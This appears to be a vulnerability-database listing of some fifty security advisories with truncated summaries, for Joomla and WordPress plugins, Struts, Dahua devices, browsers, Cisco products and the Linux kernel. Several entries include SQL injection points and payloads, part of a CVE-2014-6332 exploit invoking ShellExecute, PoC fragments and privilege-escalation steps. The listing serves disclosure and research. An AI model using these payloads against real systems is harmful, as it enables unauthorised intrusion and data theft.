Joomla! Component JO Facebook Gallery v4.5 - SQL Injection
Joomla! Component JO Facebook Gallery v4.5 - SQL Injection. The id parameter of index.php is passed into the SQL statement; GET-type injection. Injection point: http://localhost/PATH/index.php?option=com_jofacebookgallery&view=category&id=SQL http://localhost/PATH/index.php?...
S2-045: Struts 2 Remote Code Execution vulnerability(CVE-2017-5638)
This Struts remote code execution vulnerability lies in the Jakarta plugin: a malicious user can trigger it by modifying the Content-Type value of the HTTP request header during a file upload, and then execute system commands. Sound detection method: the detection method by the constant...
Joomla! Component JSP Store Locator v2.2 - SQL Injection
Joomla! Component JSP Store Locator v2.2 - SQL Injection. The id parameter of index.php is passed into the SQL statement; GET-type injection. Injection point: http://localhost/PATH/index.php?option=com_jsplocation&task=directionview&id=SQL http://localhost/PATH/index.php?...
ohocms catid_user_save.php code execution vulnerability
No description provided by source...
Joomla! Component OneVote! v1.0 - SQL Injection
Joomla! Component OneVote! v1.0 - SQL Injection. The electionid parameter of results.php is passed into the SQL statement; GET-type injection. Injection point: http://localhost/PATH/components/com_onevote/results.php?electionid=SQL Union-injected payload: +/*!50000union*/+select+@@version-- - Test...
Dahua backdoor Generation 2 and 3
I'm speechless, and almost don't know what I should write... I can hardly believe what I have just found. I have just discovered what I strongly believe is a backdoor in Dahua DVR/NVR/IPC and possibly all their clones. Since I am convinced this is a backdoor, I have my own policy to NOT notify...
seacms search.php code execution vulnerability
function parseIf$content if strpos$content,'if:'=== false return $content; else $labelRule = buildregx"if:.? .? end if","is"; $labelRule2="elseif"; $labelRule3="else"; pregmatchall$labelRule,$content,$iar; $arlen=count$iar0; $elseIfFlag=false; for$m=0;$mparseStrIf$strIf; $strThen=$iar2$m;...
WordPress Plugin Corner Ad 1.0.7 - Cross-Site Scripting
Vulnerability information. Vulnerability title: WordPress Plugin Corner Ad 1.0.7 - Cross-Site Scripting. Plugin home page: https://wordpress.org/plugins/corner-ad/ Affected plugin version: 1.0.7. Test environment: Firefox 44, Windows 10. Vulnerability details...
ohocms edittheme.php code execution vulnerability
No description provided by source...
Joomla component Recipe Manager v2.2 parameter id SQL injection vulnerability
Joomla! Component Recipe Manager v2.2 - SQL Injection. In Joomla! Component Recipe Manager v2.2, parameter filtering is not strict, leading to a SQL injection vulnerability; if the server has error display turned on, it can be exploited directly. Injection point:...
WordPress Plugin Mail Masta 1.0 - SQL Injection
Vulnerability information. Vulnerability title: WordPress Plugin Mail Masta 1.0 - SQL Injection. Plugin home page: https://wpcore.com/plugin/mail-masta Vulnerability type: SQL injection. CVE: CVE-2017-6095, CVE-2017-6096, CVE-2017-6097, CVE-2017-6098. Vulnerability analysis. The first injection...
IE Godmode remote code execution vulnerability (CVE-2014-6332)
No description provided by source. alliedve.htm // alliewin95+ie3-win10+ie11 dve copy by yuange in 2009. cve-2014-6332 exploit https://twitter.com/yuange75 http://hi.baidu.com/yuange1975 // function runmumaa On Error Resume Next set shell=createobject"Shell.Application" shell.ShellExecute...
Joomla! Component Abstract v2.1 - SQL Injection
Joomla! Component Abstract v2.1 - SQL Injection. In Joomla! Component Abstract v2.1, parameter filtering is not strict, leading to a SQL injection vulnerability. Injection point: http://localhost/PATH/index.php?option=com_abstract&view=conferences&layout=detail&pid=SQL...
Wordpress < 4.7.1 - Username Enumeration (CVE-2017-5487)
Author: p0wd3r, Knownsec 404 Security Lab. Date: 2017-03-05. 0x00 Vulnerability overview. Vulnerability description: Recently exploit-db published a WordPress 4.7.1 username enumeration vulnerability: , in fact, the vulnerability was posted on the Internet on January 14, and given t...
2017 Visual Studio Code Workspace settings code execution
The following issue constitutes an arbitrary code execution vulnerability in Visual Studio Code, herein referred to as "Code". Users should upgrade to Code 1.9.0 or later. says: Visual Studio Code is a source code editor developed by Microsoft for Windows, Linux and macOS. It includes support for...
Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0
./zen-mobile-app-native/server/images.php: code missing authentication. The Mobile App WordPress plugin lets you turn your website into a full-featured mobile application in minutes using Mobile App Builder. Vulnerability: The code in the file ./zen-mobile-app-native/server/images.php doesn't...
MDwiki <= v0.6.2 DomXSS Vulnerability
Originally I thought this was just an implementation problem on one Tencent site; later "Black brother" reminded me to look at the source code at the GitHub address, and only then did I find that it is the open-source MDwiki general-purpose system. (MDwiki is built entirely with HTML5/JavaScript technology and runs completely on the...
Cisco AnyConnect SBL 4.3.04027 Local Privilege Escalation (CVE-2017-3813)
Run CMD.EXE with SYSTEM privileges. 1. Start Cisco AnyConnect from the logon screen. 2. Once the Cisco app comes up where you can select a profile and hit connect, hold CTRL and hit B. 3. When the Cisco About window appears, select the URL at the bottom. This will open Internet Explorer, or you can...
WordPress plugin NextGEN Gallery SQL injection vulnerability
As part of a vulnerability research project for our Sucuri Firewall WAF, we have been auditing multiple open source projects looking for security issues. While working on the WordPress plugin NextGEN Gallery, we discovered a severe SQL Injection vulnerability. This vulnerability allows an...
Cisco ASA Remote Code Execution (CVE-2016-1287)
Remote Code Execution on Cisco ASA A year ago ExodusIntel disclosed a vulnerability affecting the IKE implementation in Cisco’s ASA products. The error is due to an overflow in the checking of reassembled IKE fragments, and allows remote code execution from an unauthenticated attacker. More...
Remote Code Execution as Root via ESET Endpoint Antivirus 6(CVE-2016-9892)
Introduction ============ Per ESET's online material, "ESET Endpoint Antivirus for OS X delivers award-winning cross-platform protection for multi-platform environments. It protects against malware and spyware and shields end users from fake websites phishing for sensitive information such as...
Yonyou FE collaborative Office system file_publish_open.jsp parameter id time-delay injection
No description provided by source...
DokuWiki SSRF Security Bypass Vulnerability(CVE-2016-7964 )
I found an SSRF vulnerability in DokuWiki. The sendRequest method in the HTTPClient class in file /inc/HTTPClient.php has no restriction on access to private networks, such as 10.0.0.1/8, 172.16.0.0/12, 192.168.0.0/16. This allows a user to scan ports of the internal network. For example, 1. edit any page in...
Zigaform - SQL injection vulnerability
In Zigaform, the form parameter of modelforms.php is passed into SQL statements, causing SQL injection. Injection point: http://localhost/PATH/formbuilder/frontend/viewform/?form=SQL payload: AND SELECT 2120 FROMSELECT COUNT,CONCAT0x716a7a6271,SELECT ELT2120=2120,1,0x7171767071,FLOORRAND02,md5233x FROM...
Takas Classified 1.1 - SQL injection vulnerability
The subcatid, catid, locid, areaid, type, and post parameters of the controllers/Classifiedads.php file are passed into SQL statements, causing SQL injection. Injection points: http://localhost/PATH/index.php/classifiedads/ads/?&subcatid=SQL http://localhost/PATH/index...
DokuWiki fetch.php SSRF vulnerability
Author: baolongniucow protection Dragon. About DokuWiki: DokuWiki is an open-source wiki engine that runs in a PHP environment. DokuWiki is small but powerful and flexible, suitable for knowledge base management on small-team and personal websites. Vulnerability description: The latest DokuWiki...
Windows gdi32.dll heap-based out-of-bounds reads / memory disclosure (CVE-2017-0038)
In issue 757, I described multiple bugs related to the handling of DIBs (Device Independent Bitmaps) embedded in EMF records, as implemented in the user-mode Windows GDI library gdi32.dll. As a quick reminder, the DIB-embedding records follow a common scheme: they include four fields, spots denotin...
Microsoft Edge and IE: Type confusion in HandleColumnBreakOnColumnSpanningElement (CVE-2017-0037)
PoC: .class1 float: left; column-count: 5; .class2 column-span: all; columns: 1px; table border-spacing: 0px; function boom document.styleSheets0.media.mediaText = "aaaaaaaaaaaaaaaaaaaa"; th1.align = "right"; Note: The analysis below is based on a 64-bit IE running in single process mode running...
Chrome: bypass for download filetype blacklist, extension->native privesc
This bug report describes a vulnerability that can be used by an extension with some permissions to escalate to native code execution on Linux desktops if Java is installed. No user interaction is required. Chrome permits extensions with appropriate permissions "downloads" and "downloads.open" t...
FireFox RCE by chaining small bugs
The Main Bug The main bug that made this possible was a strange behavior where 'javascript:' URLs coming from bookmarks were turning into chrome windows after a refresh occurs. This gave me my first chance at potentially injecting arbitrary chrome code, achieving that would mean I have an RCE!...
Android: pointer leak via insufficient binder message verification
When frameworks/native/libs/binder/Parcel.cpp reads e.g. a string from a parcel, it does not verify that the string doesn't overlap with any byte range that was tagged as a binder object by the sender. When an attacker sends a parcel to a victim process that contains an unexpected binder handle...
Icdcprague Sqli Vulnerability
DEMO http://www.icdcprague.org/index.php?id=10 Vuln Page index.php?id=10...
MS16-104: Internet Explorer URL files Security Feature Bypass (CVE-2016-3353)
On September 13th, 2016 Microsoft released security bulletin MS16-104 1, which addresses several vulnerabilities affecting Internet Explorer. One of those vulnerabilities is CVE-2016-3353, a security feature bypass bug in the way .URL files are handled. This security issue does not allow for remo...
HotelCMS with Booking Engine - SQL injection vulnerability
The locale parameter of http://localhost/PATH/locale?locale=SQL is vulnerable to SQL injection. The error-based injection is as follows. payload: http://localhost/PATH/locale?locale=1' AND SELECT 3507 FROMSELECT COUNT,CONCATFLOORRAND02,md5233x FROM INFORMATIONSCHEMA. The PLUGINS GROUP BY xa-- Lilt Test...
Shutter user-assisted remote code execution
Description. /usr/bin/shutter in Shutter through 0.93.1 allows user-assisted remote attackers to execute arbitrary commands via a crafted image name that is mishandled during a "Run a plugin" action. 2. Proof of concept. 1 Rename an image to something like "$firefox" 2 Open the renamed file in...
Cisco Firepower Management Console 6.0 - Post Authentication UserAdd (CVE-2016-6433)
No description provided by source. This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability",...
macOS HelpViewer XSS leads to arbitrary file execution and arbitrary file read(CVE-2017-2361)
HelpViewer is an application and using WebView to show a help file. You can see it simply by the command: open /Applications/Safari.app/Contents/Resources/Safari.help or using "help:" scheme: help:openbook=com.apple.safari.help...
Apple WebKit: Bypass pop-up blocker via cross-origin or sandboxed iframe (CVE-2017-2371)
The second argument of window.open is a name for the new window. If there's a frame that has the same name, it will try to load the URL in that frame. If not, it just tries to create a new window and pop it up. But without the user's click event, its attempt will fail. Here are some snippets. RefPtr...
Adobe Flash: Use-after-free in applying bitmapfilter (CVE-2017-2985)
No description provided by source. PoC attachment download link: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=260843
Adobe Flash: Heap Overflow in YUVPlane decoding (CVE-2017-2986)
The attached FLV file causes a heap overflow in YUVPlane decoding. To reproduce, put LoadMP4.swf and yuvplane.flv on a server, and visit 127.0.0.1/LoadMP4.swf?file=yuvplane.flv. Attachment: yuvplane.flv LoadMP4.swf...
Apple WebKit: UXSS via Frame::setDocument (CVE-2017-2365)
Here's a snippet of Frame::setDocument. void Frame::setDocument(RefPtr<Document>&& newDocument) { ASSERT(!newDocument || newDocument->frame() == this); if (m_doc && m_doc->pageCacheState() != Document::InPageCache) m_doc->prepareForDestruction(); m_doc = newDocument.copyRef(); ... } Before setting |m_doc| to |newDocument|, it calls...
Apple WebKit: UXSS via FrameLoader::clear (CVE-2017-2363)
When the new page is loading, FrameLoader::clear is called to clear the old document and window. Here's a snippet of FrameLoader::clear. void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView) { ... // Do this after detaching the documen...
Linux kernel DCCP double-free vulnerability(CVE-2017-6074)
This is an announcement about CVE-2017-6074 [1], which is a double-free vulnerability I found in the Linux kernel. It can be exploited to gain kernel code execution from an unprivileged process. Fixed on Feb 17, 2017:...
Android Arbitrary class loading and instantiation in protobuf parcelable "javanano" compiler
The protobuf library includes the "javanano" compiler, commonly used in many Android applications due to its tiny resource footprint. The "javanano" compiler supports a variety of Android-specific compilation flags which can be used to modify the generated message classes. One such compilation fl...
Google Chrome: out-of-bound read in layout
Chrome bug: https://bugs.chromium.org/p/chromium/issues/detail?id=671328 PoC: content contain: size layout; function leak document.execCommand"selectAll"; opt.text = ""; aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Infoleak is demonstrated in th...
Axessh 4.2 - Denial Of Service
Axessh is an SSH tool for Windows. Once it is run, it opens SSH port 22 and starts the wsshed.exe service. When wsshed.exe receives a string, it calls BIGNUM-related functions to process it, but the BIGNUM structure is never initialized, which leads to a null pointer dereference and a denial-of-service vulnerability. The vulnerability is analyzed in detail below. One thing to note is that the PoC given by Exploit-DB triggers the vulnerability, but in fact any connection to port 22 triggers it, even if only a single byte is sent. Attach to wsshed.exe, run the PoC, and a break occurs; the location where the vulnerability triggers is captured here. 0:000 g f74.a68: Access violation - code c00000...
QEMU: virtfs permits guest to access entire host filesystem (CVE-2016-9602)
If an attacker can execute arbitrary code in the guest kernel and a virtfs is set up, the attacker can access the entire filesystem of the host using a symlink attack. This might require the security model "passthrough" or "none" - I haven't tested with the mapped modes. Repro steps: 1. Place som...
NSFOCUS Web application firewall arbitrary command execution vulnerability
NSFOCUS Web Application Firewall, also known as Web Application Protection System (WAF for short), is a web security product developed by NSFOCUS. The NSFOCUS Web application firewall has an arbitrary command...
74cms front-end type parameter template engine injection vulnerability
This is a server-side template injection vulnerability. Application/Home/Controller/MController.class.php apply'Mobile' redirectbuildmobileurl; $type = I'get. type','android','trim'; $androiddownloadurl = C'qscmsandroiddownload'? C'qscmsandroiddownload':"; $iosdownloadurl = C'qscmsiosdownload'?...
D-Link ADSL Router DSL-2730U/2750U/2750E - Remote File Disclosure
No description provided by source...